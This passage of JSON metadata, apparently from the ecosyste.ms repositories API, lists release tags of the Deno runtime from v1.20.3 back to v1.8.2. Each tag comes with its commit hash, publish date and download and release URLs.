itHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"